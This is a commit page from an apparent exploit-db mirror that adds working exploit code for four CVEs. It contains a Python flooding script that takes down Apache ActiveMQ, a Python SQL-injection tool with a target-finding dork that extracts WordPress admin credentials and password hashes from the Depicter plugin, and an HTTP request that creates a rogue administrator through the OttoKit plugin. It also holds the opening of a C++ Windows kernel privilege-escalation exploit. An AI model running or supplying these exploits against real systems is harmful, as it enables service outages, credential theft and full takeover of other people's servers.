bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Merge remote-tracking branch 'exploitdb/main'

Browse source
This commit is contained in:
Brendan McDevitt 2025-05-12 00:04:05 +00:00
commit e5c82353b4
6 changed files with 1914 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

262
exploits/multiple/remote/52288.py Executable file
View file

@ -0,0 +1,262 @@
# Exploit Title: Apache ActiveMQ 6.1.6 - Denial of Service (DOS)
# Date: 2025-05-9
# Exploit Author: [Abdualhadi khalifa (https://x.com/absholi7ly/)
# Github: https://github.com/absholi7ly/CVE-2025-27533-Exploit-for-Apache-ActiveMQ
# CVE: CVE-2025-27533
import socket
import struct
import time
import datetime
import threading
import requests
import argparse
import random
from colorama import init, Fore
from tabulate import tabulate
from tqdm import tqdm
from concurrent.futures import ThreadPoolExecutor
init()
def print_banner():
banner = f"""
{Fore.CYAN}============================================================
CVE-2025-27533 Exploit PoC - Apache ActiveMQ DoS
============================================================
{Fore.YELLOW}Developed by: absholi7ly
{Fore.CYAN}============================================================{Fore.RESET}
"""
print(banner)
def _check_server_availability(host, port, admin_port=8161, timeout=2):
"""Internal function to check server availability"""
tcp_reachable = False
admin_reachable = False
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(timeout)
sock.connect((host, port))
sock.close()
tcp_reachable = True
except (socket.timeout, ConnectionRefusedError):
pass
try:
response = requests.get(f"http://{host}:{admin_port}/admin", timeout=timeout)
admin_reachable = response.status_code == 200
except (requests.Timeout, requests.ConnectionError):
pass
return tcp_reachable, admin_reachable
def check_server_availability(host, port, admin_port=8161, timeout=2, retries=5):
for _ in range(retries):
tcp_reachable, admin_reachable = _check_server_availability(host, port, admin_port, timeout)
if not tcp_reachable:
return False, admin_reachable
time.sleep(0.5)
return True, admin_reachable
def parse_hex_or_int(value):
try:
if value.startswith('0x') or value.startswith('0X'):
return int(value, 16)
return int(value)
except ValueError:
raise ValueError(f"Invalid integer or hex value: {value}")
def create_malicious_packet(buffer_size=0x1E00000, packet_id=1):
command_type = 0x01
client_id = f"EXPLOIT-PACKET-{packet_id:04d}".encode()
version = 12
packet = bytearray()
packet += b'\x00\x00\x00\x00'
packet += struct.pack("B", command_type)
packet += struct.pack(">I", len(client_id))
packet += client_id
packet += struct.pack(">I", version)
packet += struct.pack(">I", buffer_size)
packet += bytes(random.randint(0, 255) for _ in range(50))
packet_length = len(packet) - 4
packet[0:4] = struct.pack(">I", packet_length)
return packet
def send_single_packet(host, port, packet, packet_num, total_packets, buffer_size, packet_status, stop_event):
if stop_event.is_set():
return
timestamp = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S.%f")[:-3]
tcp_reachable, admin_reachable = check_server_availability(host, port)
status = f"TCP: {'Up' if tcp_reachable else 'Down'}, Admin: {'Up' if admin_reachable else 'Down'}"
local_port = "N/A"
connection_status = "Success"
max_connect_retries = 5
for connect_attempt in range(max_connect_retries):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(5)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 1024 * 1024)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 1024 * 1024)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
try:
sock.connect((host, port))
local_port = sock.getsockname()[1]
print(f"{Fore.GREEN}[+] Connected to {host}:{port} (Packet {packet_num}/{total_packets}, Port: {local_port}, Buffer: {buffer_size // (1024*1024)} MB){Fore.RESET}")
max_retries = 3
for attempt in range(max_retries):
try:
sock.send(packet)
print(f"{Fore.CYAN}[*] Sent Packet {packet_num}/{total_packets} (Port: {local_port}, Buffer: {buffer_size // (1024*1024)} MB){Fore.RESET}")
try:
response = sock.recv(2048)
response_len = len(response)
connection_status = f"Success (Response: {response_len} bytes)"
except:
connection_status = "Success (No Response)"
break
except socket.error as e:
connection_status = f"Failed: {str(e)}"
if attempt < max_retries - 1:
print(f"{Fore.YELLOW}[-] Failed to send Packet {packet_num}/{total_packets} (Attempt {attempt+1}, Port: {local_port}): {e}. Retrying...{Fore.RESET}")
time.sleep(0.5)
continue
else:
print(f"{Fore.RED}[-] Failed to send Packet {packet_num}/{total_packets} after {max_retries} attempts: {e}{Fore.RESET}")
packet_status.append([packet_num, timestamp, status, local_port, f"Packet-{packet_num:04d}", connection_status])
break
except socket.timeout:
print(f"{Fore.RED}[-] Connection timeout for Packet {packet_num}/{total_packets} (Port: {local_port}){Fore.RESET}")
packet_status.append([packet_num, timestamp, "Connection Timeout", local_port, f"Packet-{packet_num:04d}", "Timeout"])
break
except socket.error as e:
error_str = str(e)
if "10053" in error_str:
error_type = "Connection Reset"
elif "timeout" in error_str:
error_type = "Timeout"
else:
error_type = "Other"
if "10053" in error_str and connect_attempt < max_connect_retries - 1:
print(f"{Fore.YELLOW}[-] [WinError 10053] for Packet {packet_num}/{total_packets} (Attempt {connect_attempt+1}): {e}. Retrying connection...{Fore.RESET}")
time.sleep(1)
continue
print(f"{Fore.RED}[-] Error connecting for Packet {packet_num}/{total_packets} (Port: {local_port}): {e}{Fore.RESET}")
packet_status.append([packet_num, timestamp, f"Error: {error_type}", local_port, f"Packet-{packet_num:04d}", f"Error: {error_str}"])
break
finally:
sock.close()
packet = None
def send_packets(host, port, total_packets=2000, buffer_sizes=[0x1E00000, 0x3200000]):
packet_status = []
stop_event = threading.Event()
max_threads = 2
pbar = tqdm(total=total_packets, desc="Sending Packets", unit="packet")
def monitor_server():
while not stop_event.is_set():
tcp_reachable, _ = check_server_availability(host, port)
if not tcp_reachable:
print(f"{Fore.GREEN}[+] Server TCP port {port} is down!{Fore.RESET}")
stop_event.set()
break
time.sleep(1)
monitor_thread = threading.Thread(target=monitor_server)
monitor_thread.start()
packet_num = 1
with ThreadPoolExecutor(max_workers=max_threads) as executor:
futures = []
while packet_num <= total_packets and not stop_event.is_set():
buffer_size = random.choice(buffer_sizes)
packet = create_malicious_packet(buffer_size, packet_num)
future = executor.submit(
send_single_packet,
host, port, packet, packet_num, total_packets, buffer_size, packet_status, stop_event
)
futures.append(future)
packet_num += 1
pbar.update(1)
time.sleep(random.uniform(0.3, 0.5))
if packet_num % 50 == 0:
tcp_reachable, _ = check_server_availability(host, port)
time.sleep(2)
if not tcp_reachable:
print(f"{Fore.GREEN}[+] Server TCP port {port} is down!{Fore.RESET}")
stop_event.set()
break
print(f"{Fore.MAGENTA}[*] {packet_num} packets sent,{Fore.RESET}")
pbar.close()
stop_event.set()
monitor_thread.join()
packet_status.sort(key=lambda x: x[0])
total_sent = len(packet_status)
successful = sum(1 for p in packet_status if p[5].startswith("Success"))
failed = total_sent - successful
print(f"\n{Fore.CYAN}[*] Packet Status Table:{Fore.RESET}")
print(tabulate(
packet_status,
headers=["Packet #", "Timestamp", "Server Status", "Local Port", "Packet ID", "Connection"],
tablefmt="fancy_grid",
stralign="center",
numalign="center"
))
print(f"\n{Fore.CYAN}[*] Exploit Statistics:{Fore.RESET}")
print(f" - Total Packets Sent: {total_sent}")
print(f" - Successful Packets: {successful} ({successful/total_sent*100:.2f}%)")
print(f" - Failed Packets: {failed} ({failed/total_sent*100:.2f}%)")
tcp_reachable, admin_reachable = check_server_availability(host, port)
print(f"\n{Fore.CYAN}[*] Final Server Status:{Fore.RESET}")
if not tcp_reachable:
print(f"{Fore.GREEN}[+] Exploit Successful: TCP port {port} is down!{Fore.RESET}")
else:
print(f"{Fore.YELLOW}[-] Exploit Incomplete: TCP port {port} still up.{Fore.RESET}")
return packet_status
def main():
print_banner()
parser = argparse.ArgumentParser(description="CVE-2025-27533 Exploit PoC for Apache ActiveMQ")
parser.add_argument("--host", default="127.0.0.1", help="Target IP address")
parser.add_argument("--port", type=int, default=61616, help="OpenWire port")
parser.add_argument("--total-packets", type=int, default=2000, help="Total packets to send")
parser.add_argument("--buffer-sizes", type=parse_hex_or_int, nargs='+', default=[0x1E00000, 0x3200000],
help="Buffer sizes in bytes (decimal or hex)")
args = parser.parse_args()
print(f"{Fore.CYAN}[*] Exploit Configuration:{Fore.RESET}")
print(f" - Target: {args.host}:{args.port}")
print(f" - Total Packets: {args.total_packets}")
print(f" - Buffer Sizes: {[f'{size:#x} ({size // (1024*1024)} MB)' for size in args.buffer_sizes]}")
print(f"\n{Fore.CYAN}[*] Sending malicious packets...{Fore.RESET}")
packet_status = send_packets(args.host, args.port, args.total_packets, args.buffer_sizes)
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
print(f"{Fore.RED}[-] Program interrupted by user.{Fore.RESET}")

232
exploits/multiple/webapps/52285.py Executable file
View file

@ -0,0 +1,232 @@
# Exploit Title: WordPress Depicter Plugin 3.6.1 - SQL Injection
# Google Dork: inurl:/wp-content/plugins/depicter/
# Date: 2025-05-06
# Exploit Author: Andrew Long (datagoboom)
# Vendor Homepage: https://wordpress.org/plugins/depicter/
# Software Link: https://downloads.wordpress.org/plugin/depicter.3.6.1.zip
# Version: <= 3.6.1
# Tested on: WordPress 6.x
# CVE: CVE-2025-2011
# Description:
# The Slider & Popup Builder by Depicter plugin for WordPress is vulnerable to SQL Injection via the 's' parameter in all versions up to, and including, 3.6.1.
# The vulnerability exists due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.
# This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
# The vulnerability is located in the admin-ajax.php endpoint and can be exploited through the 's' parameter. The PoC demonstrates how to:
# 1. Check if a target is vulnerable
# 2. Extract admin user details
# 3. Execute custom SQL queries
# The exploit is provided as a Python script (poc.py) that includes:
# - Error-based SQL injection detection
# - Admin user information extraction
# - Custom SQL query execution capability
# - Debug mode for detailed output
#!/usr/bin/env python3
import argparse
import re
import sys
import time
import html
import urllib.parse
from urllib.parse import urlparse
try:
import requests
from colorama import Fore, Style, init
init(autoreset=True)
USE_COLOR = True
except ImportError:
class MockColorama:
def __getattr__(self, name):
return ""
Fore = Style = MockColorama()
USE_COLOR = False
print("[!] Missing dependencies. Install with: pip install requests colorama")
print("[!] Continuing without colored output...")
def print_banner():
banner = f"""
{Fore.CYAN}
{Fore.CYAN} {Fore.RED}CVE-2025-2011 - SQLi in Depicter Slider & Popup Builder <3.6.2 {Fore.CYAN}
{Fore.CYAN} {Fore.GREEN}By datagoboom {Fore.CYAN}
{Fore.CYAN}{Style.RESET_ALL}
"""
print(banner)
def verify_target(url):
parsed_url = urlparse(url)
if not parsed_url.scheme:
url = "http://" + url
if url.endswith('/'):
url = url[:-1]
print(f"{Fore.YELLOW}[*] Target URL: {url}")
return url
def test_connection(url):
try:
response = requests.get(url, timeout=10)
if response.status_code == 200:
print(f"{Fore.GREEN}[+] Successfully connected to the target")
return True
else:
print(f"{Fore.RED}[-] Received status code {response.status_code}")
return False
except requests.exceptions.RequestException as e:
print(f"{Fore.RED}[-] Connection error: {e}")
return False
def extract_data(url, sql_query, max_length=50, debug=False):
payload = f"test%' AND EXTRACTVALUE(1,CONCAT(0x7e,({sql_query}),0x7e))='&perpage=20&page=1&orderBy=source_id&dateEnd=&dateStart=&order=DESC&sources=&action=depicter-lead-index"
target_url = f"{url}/wp-admin/admin-ajax.php?s={payload}"
try:
if debug:
print(f"{Fore.BLUE}[DEBUG] Requesting: {target_url}")
response = requests.get(target_url, timeout=20)
if debug:
print(f"{Fore.BLUE}[DEBUG] Response status: {response.status_code}")
decoded_text = html.unescape(response.text)
error_pattern = r"XPATH syntax error: '~(.*?)~'"
match = re.search(error_pattern, decoded_text)
if match:
extracted_data = match.group(1)
return extracted_data
else:
if debug:
print(f"{Fore.RED}[-] No XPATH syntax error found in response")
if "XPATH syntax error" in decoded_text:
print(f"{Fore.RED}[-] XPATH error found but regex didn't match. Response excerpt:")
print(f"{Fore.RED}[-] {decoded_text[:500]}")
else:
print(f"{Fore.RED}[-] Response doesn't contain XPATH error. Response excerpt:")
print(f"{Fore.RED}[-] {decoded_text[:500]}")
return None
except requests.exceptions.RequestException as e:
print(f"{Fore.RED}[-] Error during extraction: {e}")
return None
def check_vulnerability(url, debug=False):
print(f"{Fore.YELLOW}[*] Checking if the target is vulnerable...")
result = extract_data(url, "database()", debug=debug)
if result:
print(f"{Fore.GREEN}[+] Target is VULNERABLE!")
print(f"{Fore.GREEN}[+] Database name: {result}")
return True
else:
result = extract_data(url, "VERSION()", debug=debug)
if result:
print(f"{Fore.GREEN}[+] Target is VULNERABLE!")
print(f"{Fore.GREEN}[+] MySQL version: {result}")
return True
else:
result = extract_data(url, "'test'", debug=debug)
if result:
print(f"{Fore.GREEN}[+] Target is VULNERABLE!")
print(f"{Fore.GREEN}[+] Test value: {result}")
return True
else:
print(f"{Fore.RED}[-] Target does not appear to be vulnerable")
manual_check = f"{url}/wp-admin/admin-ajax.php?s=test%' AND EXTRACTVALUE(1,CONCAT(0x7e,VERSION(),0x7e))='&perpage=20&page=1&orderBy=source_id&dateEnd=&dateStart=&order=DESC&sources=&action=depicter-lead-index"
print(f"{Fore.YELLOW}[*] Try checking manually in your browser: \n{manual_check}")
return False
def extract_admin_details(url, debug=False):
print(f"{Fore.YELLOW}[*] Extracting admin user details...")
admin_username = extract_data(url, "SELECT user_login FROM wp_users WHERE ID=1 LIMIT 1", debug=debug)
if admin_username:
print(f"{Fore.GREEN}[+] Admin username: {admin_username}")
admin_email = extract_data(url, "SELECT user_email FROM wp_users WHERE ID=1 LIMIT 1", debug=debug)
if admin_email:
print(f"{Fore.GREEN}[+] Admin email: {admin_email}")
hash_left = extract_data(url, "SELECT LEFT(user_pass,30) FROM wp_users WHERE ID=1 LIMIT 1", debug=debug)
if hash_left:
hash_right = extract_data(url, "SELECT SUBSTRING(user_pass,31,30) FROM wp_users WHERE ID=1 LIMIT 1", debug=debug)
if hash_right:
full_hash = hash_left + hash_right
else:
print(f"{Fore.YELLOW}[*] Could not retrieve full hash - bcrypt hashes are typically 60 chars long")
print(f"{Fore.GREEN}[+] Admin password hash: {full_hash}")
else:
print(f"{Fore.RED}[-] Failed to extract admin password hash")
return {
"username": admin_username,
"email": admin_email,
"password_hash": hash_left
}
else:
print(f"{Fore.RED}[-] Failed to extract admin details")
return None
def extract_custom_data(url, query, debug=False):
print(f"{Fore.YELLOW}[*] Executing custom SQL query...")
print(f"{Fore.YELLOW}[*] Query: {query}")
result = extract_data(url, query, debug=debug)
if result:
print(f"{Fore.GREEN}[+] Result: {result}")
return result
else:
print(f"{Fore.RED}[-] Failed to execute query or no results returned")
return None
def main():
parser = argparse.ArgumentParser(description='CVE-2025-2011 - SQLi in Depicter Slider & Popup Builder')
parser.add_argument('-u', '--url', required=True, help='Target WordPress URL')
parser.add_argument('-m', '--mode', default='check', choices=['check', 'admin', 'custom'],
help='Extraction mode: check=vulnerability check, admin=admin details, custom=custom SQL query')
parser.add_argument('-q', '--query', help='Custom SQL query (use with -m custom)')
parser.add_argument('-d', '--debug', action='store_true', help='Enable debug output')
args = parser.parse_args()
print_banner()
target_url = verify_target(args.url)
if not test_connection(target_url):
print(f"{Fore.RED}[-] Exiting due to connection failure")
sys.exit(1)
if not check_vulnerability(target_url, debug=args.debug):
if args.mode != 'check':
print(f"{Fore.YELLOW}[!] Target may not be vulnerable, but continuing with requested mode...")
else:
print(f"{Fore.RED}[-] Exiting as target does not appear to be vulnerable")
sys.exit(1)
if args.mode == 'check':
pass
elif args.mode == 'admin':
extract_admin_details(target_url, debug=args.debug)
elif args.mode == 'custom':
if not args.query:
print(f"{Fore.RED}[-] Custom mode requires a SQL query (-q/--query)")
sys.exit(1)
extract_custom_data(target_url, args.query, debug=args.debug)
print(f"\n{Fore.YELLOW}[!] Exploitation complete")
if __name__ == "__main__":
main()

33
exploits/multiple/webapps/52286.txt Normal file
View file

@ -0,0 +1,33 @@
# Exploit Title: SureTriggers OttoKit Plugin 1.0.82 - Privilege Escalation
# Date: 2025-05-7
# Exploit Author: [Abdualhadi khalifa (https://x.com/absholi7ly/)
# Affected: Versions All versions of OttoKit (SureTriggers) ≤ 1.0.82.
Conditions for Exploitation
<https://github.com/absholi7ly/CVE-2025-27007-OttoKit-exploit/#conditions-for-exploitation>
The vulnerability can be exploited under the following circumstances:
1. OttoKit must be installed and activated on the target WordPress site.
2. The plugin *uninitialized* (e.g., no API key or "secret_key" is set
in the database).
3. The target site displays the REST API endpoint
'/wp-json/sure-triggers/v1/automation/action'.
------------------------------
HTTP Request
<https://github.com/absholi7ly/CVE-2025-27007-OttoKit-exploit/#http-request>
The following request targets the
/wp-json/sure-triggers/v1/automation/action endpoint to create an
administrator account:
POST /wp-json/sure-triggers/v1/automation/action HTTP/1.1
Host: [target-site]
Content-Type: application/x-www-form-urlencoded
St-Authorization:
Content-Length: [length]
selected_options[user_name]=new_admin&selected_options[user_email]=
attacker@example.com&selected_options[password]=StrongP@ssw0rd123
&selected_options[role]=administrator&aintegration=WordPress&type_event=create_user_if_not_exists

883
exploits/windows/local/52284.C++ Normal file
View file

@ -0,0 +1,883 @@
# Exploit Title: Microsoft Windows 11 Pro 23H2 - Ancillary Function Driver for WinSock Privilege Escalation
# Date: 2025-05-05
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Contact: miladgrayhat@gmail.com
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# Tested on: Win x64
# CVE : CVE-2024-38193
#pragma once
#include "ntstatus.h"
#include "Windows.h"
#include <iostream>
#pragma comment(lib, "ntdll.lib")
#define HIDWORD(l) ((DWORD)(((DWORDLONG)(l)>>32)&0xFFFFFFFF))
#define LODWORD(l) ((DWORD)((DWORDLONG)(l)))
#define AfdOpenPacket "AfdOpenPacketXX"
#define AFD_DEVICE_NAME L"\\Device\\Afd"
#define LOCALHOST "127.0.0.1"
#define IOCTL_AFD_BIND 0x12003LL
#define IOCTL_AFD_LISTEN 0x1200BLL
#define IOCTL_AFD_CONNECT 0x120BBLL
#define IOCTL_AFD_GET_SOCK_NAME 0x1202FLL
#define FSCTL_PIPE_PEEK 0x11400CLL
#define FSCTL_PIPE_IMPERSONATE 0x11001CLL
#define FSCTL_PIPE_INTERNAL_WRITE 0x119FF8
#define OBJ_CASE_INSENSITIVE 0x00000040
#define OBJ_INHERIT 0x00000002
#define FILE_OPEN_IF 0x3
#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
#define OFFSET_IN_TOKEN_VARIABLEPART 0x490
#define OFFSET_IN_TOKEN_TOKEN_PRIVILEGES 0x40
#define OFFSET_IN_TOKEN_PRIMARY_GROUP 0xA8
#define OFFSET_IN_TOKEN_DYNAMIC_PART 0xB0
#define OFFSET_IN_TOKEN_DEFAULT_DACL 0xB8
#define PREVIOUS_MODE_OFFSET 0x232
#define OFFSET_TO_ACTIVE_PROCESS_LINKS 0x448
#define OFFSET_TO_TOKEN 0x4b8
#define CURRENT_THREAD (HANDLE)0xFFFFFFFFFFFFFFFE
typedef struct IO_STATUS_BLOCK
{
union
{
DWORD Status;
PVOID Pointer;
};
DWORD* Information;
};
//0x4 bytes (sizeof)
struct _SYSTEM_POWER_STATE_CONTEXT
{
union
{
struct
{
ULONG Reserved1 : 8; //0x0
ULONG TargetSystemState : 4; //0x0
ULONG EffectiveSystemState : 4; //0x0
ULONG CurrentSystemState : 4; //0x0
ULONG IgnoreHibernationPath : 1; //0x0
ULONG PseudoTransition : 1; //0x0
ULONG KernelSoftReboot : 1; //0x0
ULONG DirectedDripsTransition : 1; //0x0
ULONG Reserved2 : 8; //0x0
};
ULONG ContextAsUlong; //0x0
};
};
//0x4 bytes (sizeof)
union _POWER_STATE
{
enum _SYSTEM_POWER_STATE SystemState; //0x0
enum _DEVICE_POWER_STATE DeviceState; //0x0
};
//0x48 bytes (sizeof)
typedef struct _IO_STACK_LOCATION
{
UCHAR MajorFunction; //0x0
UCHAR MinorFunction; //0x1
UCHAR Flags; //0x2
UCHAR Control; //0x3
union
{
struct
{
struct _IO_SECURITY_CONTEXT* SecurityContext; //0x8
ULONG Options; //0x10
USHORT FileAttributes; //0x18
USHORT ShareAccess; //0x1a
ULONG EaLength; //0x20
} Create; //0x8
struct
{
struct _IO_SECURITY_CONTEXT* SecurityContext; //0x8
ULONG Options; //0x10
USHORT Reserved; //0x18
USHORT ShareAccess; //0x1a
struct _NAMED_PIPE_CREATE_PARAMETERS* Parameters; //0x20
} CreatePipe; //0x8
struct
{
struct _IO_SECURITY_CONTEXT* SecurityContext; //0x8
ULONG Options; //0x10
USHORT Reserved; //0x18
USHORT ShareAccess; //0x1a
struct _MAILSLOT_CREATE_PARAMETERS* Parameters; //0x20
} CreateMailslot; //0x8
struct
{
ULONG Length; //0x8
ULONG Key; //0x10
ULONG Flags; //0x14
union _LARGE_INTEGER ByteOffset; //0x18
} Read; //0x8
struct
{
ULONG Length; //0x8
ULONG Key; //0x10
ULONG Flags; //0x14
union _LARGE_INTEGER ByteOffset; //0x18
} Write; //0x8
struct
{
ULONG Length; //0x8
struct _UNICODE_STRING* FileName; //0x10
enum _FILE_INFORMATION_CLASS FileInformationClass; //0x18
ULONG FileIndex; //0x20
} QueryDirectory; //0x8
struct
{
ULONG Length; //0x8
ULONG CompletionFilter; //0x10
} NotifyDirectory; //0x8
struct
{
ULONG Length; //0x8
ULONG CompletionFilter; //0x10
enum _DIRECTORY_NOTIFY_INFORMATION_CLASS
DirectoryNotifyInformationClass; //0x18
} NotifyDirectoryEx; //0x8
struct
{
ULONG Length; //0x8
enum _FILE_INFORMATION_CLASS FileInformationClass; //0x10
} QueryFile; //0x8
struct
{
ULONG Length; //0x8
enum _FILE_INFORMATION_CLASS FileInformationClass; //0x10
struct _FILE_OBJECT* FileObject; //0x18
union
{
struct
{
UCHAR ReplaceIfExists; //0x20
UCHAR AdvanceOnly; //0x21
};
ULONG ClusterCount; //0x20
VOID* DeleteHandle; //0x20
};
} SetFile; //0x8
struct
{
ULONG Length; //0x8
VOID* EaList; //0x10
ULONG EaListLength; //0x18
ULONG EaIndex; //0x20
} QueryEa; //0x8
struct
{
ULONG Length; //0x8
} SetEa; //0x8
struct
{
ULONG Length; //0x8
enum _FSINFOCLASS FsInformationClass; //0x10
} QueryVolume; //0x8
struct
{
ULONG Length; //0x8
enum _FSINFOCLASS FsInformationClass; //0x10
} SetVolume; //0x8
struct
{
ULONG OutputBufferLength; //0x8
ULONG InputBufferLength; //0x10
ULONG FsControlCode; //0x18
VOID* Type3InputBuffer; //0x20
} FileSystemControl; //0x8
struct
{
union _LARGE_INTEGER* Length; //0x8
ULONG Key; //0x10
union _LARGE_INTEGER ByteOffset; //0x18
} LockControl; //0x8
struct
{
ULONG OutputBufferLength; //0x8
ULONG InputBufferLength; //0x10
ULONG IoControlCode; //0x18
VOID* Type3InputBuffer; //0x20
} DeviceIoControl; //0x8
struct
{
ULONG SecurityInformation; //0x8
ULONG Length; //0x10
} QuerySecurity; //0x8
struct
{
ULONG SecurityInformation; //0x8
VOID* SecurityDescriptor; //0x10
} SetSecurity; //0x8
struct
{
struct _VPB* Vpb; //0x8
struct _DEVICE_OBJECT* DeviceObject; //0x10
} MountVolume; //0x8
struct
{
struct _VPB* Vpb; //0x8
struct _DEVICE_OBJECT* DeviceObject; //0x10
} VerifyVolume; //0x8
struct
{
struct _SCSI_REQUEST_BLOCK* Srb; //0x8
} Scsi; //0x8
struct
{
ULONG Length; //0x8
VOID* StartSid; //0x10
struct _FILE_GET_QUOTA_INFORMATION* SidList; //0x18
ULONG SidListLength; //0x20
} QueryQuota; //0x8
struct
{
ULONG Length; //0x8
} SetQuota; //0x8
struct
{
enum _DEVICE_RELATION_TYPE Type; //0x8
} QueryDeviceRelations; //0x8
struct
{
struct _GUID* InterfaceType; //0x8
USHORT Size; //0x10
USHORT Version; //0x12
struct _INTERFACE* Interface; //0x18
VOID* InterfaceSpecificData; //0x20
} QueryInterface; //0x8
struct
{
struct _DEVICE_CAPABILITIES* Capabilities; //0x8
} DeviceCapabilities; //0x8
struct
{
struct _IO_RESOURCE_REQUIREMENTS_LIST*
IoResourceRequirementList; //0x8
} FilterResourceRequirements; //0x8
struct
{
ULONG WhichSpace; //0x8
VOID* Buffer; //0x10
ULONG Offset; //0x18
ULONG Length; //0x20
} ReadWriteConfig; //0x8
struct
{
UCHAR Lock; //0x8
} SetLock; //0x8
struct
{
enum BUS_QUERY_ID_TYPE IdType; //0x8
} QueryId; //0x8
struct
{
enum DEVICE_TEXT_TYPE DeviceTextType; //0x8
ULONG LocaleId; //0x10
} QueryDeviceText; //0x8
struct
{
UCHAR InPath; //0x8
UCHAR Reserved[3]; //0x9
enum _DEVICE_USAGE_NOTIFICATION_TYPE Type; //0x10
} UsageNotification; //0x8
struct
{
enum _SYSTEM_POWER_STATE PowerState; //0x8
} WaitWake; //0x8
struct
{
struct _POWER_SEQUENCE* PowerSequence; //0x8
} PowerSequence; //0x8
struct
{
union
{
ULONG SystemContext; //0x8
struct _SYSTEM_POWER_STATE_CONTEXT SystemPowerStateContext;
//0x8
};
enum _POWER_STATE_TYPE Type; //0x10
union _POWER_STATE State; //0x18
enum POWER_ACTION ShutdownType; //0x20
} Power; //0x8
struct
{
struct _CM_RESOURCE_LIST* AllocatedResources; //0x8
struct _CM_RESOURCE_LIST* AllocatedResourcesTranslated; //0x10
} StartDevice; //0x8
struct
{
ULONGLONG ProviderId; //0x8
VOID* DataPath; //0x10
ULONG BufferSize; //0x18
VOID* Buffer; //0x20
} WMI; //0x8
struct
{
VOID* Argument1; //0x8
VOID* Argument2; //0x10
VOID* Argument3; //0x18
VOID* Argument4; //0x20
} Others; //0x8
} Parameters; //0x8
struct _DEVICE_OBJECT* DeviceObject; //0x28
struct _FILE_OBJECT* FileObject; //0x30
LONG(*CompletionRoutine)(struct _DEVICE_OBJECT* arg1, struct _IRP*
arg2, VOID* arg3); //0x38
VOID* Context; //0x40
}IO_STACK_LOCATION;
//0x18 bytes (sizeof)
struct _KDEVICE_QUEUE_ENTRY
{
struct _LIST_ENTRY DeviceListEntry; //0x0
ULONG SortKey; //0x10
UCHAR Inserted; //0x14
};
//0x58 bytes (sizeof)
struct _KAPC
{
UCHAR Type; //0x0
UCHAR AllFlags; //0x1
UCHAR Size; //0x2
UCHAR SpareByte1; //0x3
ULONG SpareLong0; //0x4
struct _KTHREAD* Thread; //0x8
struct _LIST_ENTRY ApcListEntry; //0x10
VOID* Reserved[3]; //0x20
VOID* NormalContext; //0x38
VOID* SystemArgument1; //0x40
VOID* SystemArgument2; //0x48
CHAR ApcStateIndex; //0x50
CHAR ApcMode; //0x51
UCHAR Inserted; //0x52
};
//0xd0 bytes (sizeof)
struct _IRP
{
SHORT Type; //0x0
USHORT Size; //0x2
USHORT AllocationProcessorNumber; //0x4
USHORT Reserved; //0x6
struct _MDL* MdlAddress; //0x8
ULONG Flags; //0x10
union
{
struct _IRP* MasterIrp; //0x18
LONG IrpCount; //0x18
VOID* SystemBuffer; //0x18
} AssociatedIrp; //0x18
struct _LIST_ENTRY ThreadListEntry; //0x20
struct IO_STATUS_BLOCK IoStatus; //0x30
CHAR RequestorMode; //0x40
UCHAR PendingReturned; //0x41
CHAR StackCount; //0x42
CHAR CurrentLocation; //0x43
UCHAR Cancel; //0x44
UCHAR CancelIrql; //0x45
CHAR ApcEnvironment; //0x46
UCHAR AllocationFlags; //0x47
union
{
struct _IO_STATUS_BLOCK* UserIosb; //0x48
VOID* IoRingContext; //0x48
};
struct _KEVENT* UserEvent; //0x50
union
{
struct
{
union
{
VOID(*UserApcRoutine)(VOID* arg1, struct _IO_STATUS_BLOCK*
arg2, ULONG arg3); //0x58
VOID* IssuingProcess; //0x58
};
union
{
VOID* UserApcContext; //0x60
struct _IORING_OBJECT* IoRing; //0x60
};
} AsynchronousParameters; //0x58
union _LARGE_INTEGER AllocationSize; //0x58
} Overlay; //0x58
VOID(*CancelRoutine)(struct _DEVICE_OBJECT* arg1, struct _IRP* arg2);
//0x68
VOID* UserBuffer; //0x70
union
{
struct
{
union
{
struct _KDEVICE_QUEUE_ENTRY DeviceQueueEntry; //0x78
VOID* DriverContext[4]; //0x78
};
struct _ETHREAD* Thread; //0x98
CHAR* AuxiliaryBuffer; //0xa0
struct _LIST_ENTRY ListEntry; //0xa8
union
{
struct _IO_STACK_LOCATION* CurrentStackLocation; //0xb8
ULONG PacketType; //0xb8
};
struct _FILE_OBJECT* OriginalFileObject; //0xc0
VOID* IrpExtension; //0xc8
} Overlay; //0x78
struct _KAPC Apc; //0x78
VOID* CompletionKey; //0x78
} Tail; //0x78
};
typedef struct _TA_ADDRESS
{
USHORT AddressLength;
USHORT AddressType;
UCHAR Address[1];
}TA_ADDRESS;
typedef struct _TRANSPORT_ADDRESS
{
LONG TAAddressCount;
TA_ADDRESS Address[1];
}TRANSPORT_ADDRESS;
typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, * PUNICODE_STRING;
typedef struct _OBJECT_ATTRIBUTES
{
ULONG Length;
HANDLE RootDirectory;
PUNICODE_STRING ObjectName;
ULONG Attributes;
PVOID SecurityDescriptor;
PVOID SecurityQualityOfService;
}OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;
typedef struct _SYSTEM_MODULE_ENTRY
{
HANDLE Section;
PVOID MappedBase;
PVOID ImageBase;
ULONG ImageSize;
ULONG Flags;
USHORT LoadOrderIndex;
USHORT InitOrderIndex;
USHORT LoadCount;
USHORT OffsetToFileName;
UCHAR FullPathName[256];
} SYSTEM_MODULE_ENTRY, * PSYSTEM_MODULE_ENTRY;
typedef struct _SYSTEM_MODULE_INFORMATION
{
ULONG Count;
